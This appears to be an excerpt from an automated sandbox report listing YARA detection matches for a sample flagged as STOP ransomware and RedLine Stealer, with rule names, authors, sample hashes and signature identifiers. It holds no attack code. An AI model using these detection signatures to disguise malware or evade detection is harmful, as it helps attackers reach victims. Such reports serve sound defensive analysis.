      Source: 9.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 9.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 9.0.bE5aaTiJM0.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 12.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 12.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 12.0.bE5aaTiJM0.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 9.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 9.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 9.0.bE5aaTiJM0.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 12.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 12.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 12.0.bE5aaTiJM0.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 12.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 12.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 12.0.bE5aaTiJM0.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 2.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 2.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 2.0.bE5aaTiJM0.exe.400000.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 14.2.bE5aaTiJM0.exe.42415a0.1.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 14.2.bE5aaTiJM0.exe.42415a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 00000009.00000000.402254205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 0000000C.00000000.439811041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 00000008.00000002.448603101.0000000004350000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 00000010.00000000.444270731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 00000010.00000000.444270731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 00000010.00000000.444270731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 0000000A.00000002.429478962.00000000041D1000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000007.00000002.409983046.0000000004290000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 00000008.00000002.448142800.00000000041B2000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 0000000E.00000002.445958712.00000000041A4000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 0000000B.00000000.421469310.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 0000000B.00000000.421469310.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 0000000B.00000000.421469310.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 00000009.00000000.403911103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 00000009.00000000.403911103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 00000009.00000000.403911103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 00000000.00000002.378159844.00000000041D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 00000010.00000000.443166129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 00000000.00000002.378332147.0000000004270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 0000000A.00000002.431402243.0000000004270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 00000002.00000000.374159139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 00000009.00000000.407464863.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 00000009.00000000.405310385.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 0000000B.00000000.422893341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
      Source: 00000002.00000000.375528936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 0000000B.00000000.418527999.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
      Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
      Source: 00000010.00000000.441549996.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
